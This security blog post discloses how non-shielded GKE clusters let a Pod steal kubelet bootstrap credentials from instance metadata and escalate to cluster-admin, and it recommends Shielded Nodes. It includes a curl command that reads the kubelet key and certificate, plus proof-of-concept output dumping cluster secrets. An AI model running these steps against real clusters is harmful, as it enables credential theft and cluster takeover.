When Shielded GKE Nodes is enabled, the GKE control plane cryptographically verifies that every node in the cluster is a virtual machine running in a managed instance group in Google’s data center and that the kubelet is only getting the certificate for itself. But Shielded GKE Nodes addresses a much bigger problem.
From the GKE documentation:
“Without Shielded GKE Nodes an attacker can exploit a vulnerability in a Pod to exfiltrate bootstrap credentials and impersonate nodes in your cluster, giving the attackers access to cluster secrets.”
The way this is worded is technically correct, but it only identifies one of several possible preconditions for this attack to be successful. Namely, a compromised Pod. But if we dig a little deeper, we can see there are more that are commonly available in most environments.
As GKE is actually a Google Cloud service that runs “on top” of Google Compute Engine, GKE Shielded Nodes leverage the underlying capabilties of GCE Shielded VMs. GKE also leverages a feature of GCE called Custom Instance Metadata to host small amounts of data that the virtual machine can access via a web request to a URL only accessible to the GCE virtual machine. Specifically, the data needed to “bootstrap” or have GCE nodes join the GKE cluster and show up as ready to handle GKE workloads. The custom attribute named
kube-env is what holds the initial set of credentials used for this purpose.
When a GKE node (a GCE virtual machine with specific configuration) first starts, the initial configuration scripts do several things to prepare the node to be a GKE worker node, and they use the custom metadata
kube-env file to obtain a list of important settings. Inside the
kube-env file is a CA certificate and a public/private certificate pair. This keypair is first used by the kubelet to “bootstrap” itself. That is, the kubelet will generate a new keypair and use the keypair from
kube-env to submit a CertificateSigningRequest to the API server. If the certificate matches the proper structure and naming conventions, the GKE control plane will autoapprove the node’s CSR, and the kubelet can fetch and use that new keypair to join the cluster.
The default configuration of GKE clusters provides no method for blocking access to the GCE Instance Metadata. In most GKE clusters, any Pod running on a node will have direct access to this metadata as from the perspective of the Metadata API, it’s just another process running on the node.
[email protected]:/# curl -s -H "Metadata-flavor: Google" 169.254.169.254/computeMetadata/v1/instance/attributes/kube-env | grep ^KUBELET KUBELET_CERT: LS0tLS...snip... KUBELET_KEY: LS0tLS..snip...
Second, the GKE control plane in non-shielded node clusters does not validate the hostname in the CSR matches the hostname that is requesting the keypair. In other words, if one can access one node’s kubelet bootstrapping keypair, they can create valid keypairs for all nodes in the cluster if they know the hostnames.
Finally, the kubelet is responsible for running workloads, so it needs the ability to fetch secrets that are attached to pods as long as they are currently scheduled on it to perform its intended task.
If one could generate valid kubelet keypairs for all nodes in the cluster, they could iterate through each and grab all the cluster secrets attached to pods running on all the nodes. In practical terms, that’s the close to the same access provided by
kubectl get secrets --all-namespaces. In nearly all clusters, at least one Kubernetes Service Account is bound to a privileged RBAC
In default GKE clusters, this means that any Pod has a direct path to escalate to cluster-admin without requiring authentication. As
cluster-admin, the user controls all data and applications running on the GKE workers as well as the union of all permissions associated with credentials attached to Pods running in the cluster. At best, it’s free compute. At worst, it’s a launch point for full GCP account takeover.
In November of 2018, this attack path was privately disclosed to the Google Vulnerability Reward Program by Darkbit’s own Brad Geesaman. That same week (coincidentally), the team at 4Armed publicly wrote up their findings on this issue. The Google VRP Team did not award a bounty as it was already identified internally as a known issue.
At the time of initial disclosure, a proof-of-concept utility was created called https://github.com/bgeesaman/kube-env-stealer, but it was not made public for six months to coincide with the release of the GKE Metadata Concealment Proxy.
kube-env-stealer is a set of scripts and a Pod deployment that automates the following process:
nginx:latestimage inside the current GKE cluster
$ ./auto-exploit.sh deployment.apps/evil-pod created deployment.extensions/evil-pod condition met [[ Checking if curl exists ]] [[ Checking if awk exists ]] [[ Checking if sed exists ]] [[ Checking if grep exists ]] [[ Checking if base64 exists ]] [[ Checking if openssl exists ]] [[ Obtain kube-env ]] [[ Source kube-env ]] [[ Get bootstrap certificate data ]] [[ Get kubectl binary ]] [[ Obtain the Hostname ]] [[ Create nodes/gke-notshielded-default-pool-144c7d3a-4pql/openssl.cnf ]] [[ Generate EC kubelet keypair for gke-notshielded-default-pool-144c7d3a-4pql ]] [[ Generate CSR for gke-notshielded-default-pool-144c7d3a-4pql ]] [[ Generate CSR YAML for gke-notshielded-default-pool-144c7d3a-4pql ]] [[ Submit CSR and Generate Certificate for gke-notshielded-default-pool-144c7d3a-4pql ]] certificatesigningrequest.certificates.k8s.io/node-csr-gke-notshielded-default-pool-144c7d3a-4pql-75BB created [[ Sleep 2 while being approved ]] [[ Download approved Cert for gke-notshielded-default-pool-144c7d3a-4pql ]] [[ Dumping secrets mounted to gke-notshielded-default-pool-144c7d3a-4pql ]] Exporting secrets/default-default-token-cfpft.json Exporting secrets/kube-system-default-token-fhlb2.json Exporting secrets/kube-system-event-exporter-sa-token-zml6x.json Exporting secrets/kube-system-fluentd-gcp-scaler-token-tsnc6.json Exporting secrets/kube-system-fluentd-gcp-token-pwmsz.json Exporting secrets/kube-system-heapster-token-dphxp.json Exporting secrets/kube-system-kube-dns-autoscaler-token-fltl5.json Exporting secrets/kube-system-kube-dns-token-wphxh.json Exporting secrets/kube-system-metadata-agent-token-2x6tk.json Exporting secrets/kube-system-metrics-server-token-w4wbh.json Exporting secrets/kube-system-prometheus-to-sd-token-n7tlv.json [[ Download a full pod listing ]] [[ Get node names ]] [[ Iterate through all other node names ]] [[ Extracting namespace, podname, and secret listing ]] drwxr-xr-x 0 root root 0 Aug 25 12:38 dumps/ -rw-r--r-- 0 root root 126965 Aug 25 12:38 dumps/allpods.json -rw-r--r-- 0 root root 847 Aug 25 12:38 dumps/ns-pod-secret-listing.txt drwxr-xr-x 0 root root 0 Aug 25 12:38 secrets/ -rw-r--r-- 0 root root 3558 Aug 25 12:38 secrets/kube-system-event-exporter-sa-token-zml6x.json -rw-r--r-- 0 root root 3476 Aug 25 12:38 secrets/kube-system-default-token-fhlb2.json -rw-r--r-- 0 root root 3483 Aug 25 12:38 secrets/kube-system-heapster-token-dphxp.json -rw-r--r-- 0 root root 3551 Aug 25 12:38 secrets/kube-system-prometheus-to-sd-token-n7tlv.json -rw-r--r-- 0 root root 3508 Aug 25 12:38 secrets/kube-system-fluentd-gcp-token-pwmsz.json -rw-r--r-- 0 root root 3565 Aug 25 12:38 secrets/kube-system-fluentd-gcp-scaler-token-tsnc6.json -rw-r--r-- 0 root root 3483 Aug 25 12:38 secrets/kube-system-kube-dns-token-wphxh.json -rw-r--r-- 0 root root 3533 Aug 25 12:38 secrets/kube-system-metadata-agent-token-2x6tk.json -rw-r--r-- 0 root root 3576 Aug 25 12:38 secrets/kube-system-kube-dns-autoscaler-token-fltl5.json -rw-r--r-- 0 root root 3448 Aug 25 12:38 secrets/default-default-token-cfpft.json -rw-r--r-- 0 root root 3533 Aug 25 12:38 secrets/kube-system-metrics-server-token-w4wbh.json deployment.apps "evil-pod" deleted
The entire process takes roughly 20-60 seconds depending on the number of nodes in the cluster, and the only required permission is
pod create in any namespace.
At the time, the GKE Metadata Concealment Proxy was the stop-gap fix. It’s functionality was later wrapped into Workload Identity. Essentially, it blocked access from Pods trying to access the sensitive Metadata API endpoints like
However, if no Admission Control is in place, a Pod that specifies running on the
host network can still access the Instance Metadata API as before and bypass these two solutions.
As mentioned in the beginning of this post, a Pod is only one way to gain access to the GCE Instance Metadata. There are other IAM Roles that can grant direct access to the GCE Instance Metadata Attributes without having to be a Pod inside the cluster. Namely, the roles that grant
compute.instances.get in the same project as the cluster can also access the
kube-env directly from the GCP API.
$ gcloud compute instances describe gke-notshielded-default-pool-144c7d3a-4pql ..snip.. id: '4278918789669244206' kind: compute#instance ..snip.. metadata: items: ..snip.. - key: kube-env value: | ..snip.. CA_CERT: LS0tLS1..snip.. KUBELET_CERT: LS0tLS1..snip.. KUBELET_KEY: LS0tLS1..snip.. ..snip.. kind: compute#metadata name: gke-notshielded-default-pool-144c7d3a-4pql ..snip.. status: RUNNING zone: https://www.googleapis.com/compute/v1/projects/gke-c2/zones/us-central1-c
If a malicious user compromised other valid credentials with this permission and the GKE API Server is network-accessible or “public” (also, a default configuration), they can perform the same attack without needing to be inside the cluster. This variant is handled with a slightly modified script that is also available in the kube-env-stealer repository
Enter GKE Shielded Nodes. Aside from all of it’s validation benefits, the key change is that the
kube-env no longer holds the sensitive kubelet bootstrapping credentials. Those are now distributed via the vTPM chip running on the hardware and are only accessible by processes on the node with
Per the GKE Shielded Nodes documentation, Shielded Nodes will be the default starting in GKE 1.18. As of this writing, the latest possible version in the rapid channel is 1.17, so it is not the default just yet. However, you can enable GKE Shielded Nodes in your cluster starting with GKE 1.13.6-gke.0 as an upgrade operation or when creating a new cluster.
The GKE Platform has recently solved a serious privilege escalation path in most default GKE clusters, and GKE customers should strongly consider enabling GKE Shielded Nodes to improve the defense-in-depth posture of their GKE environment.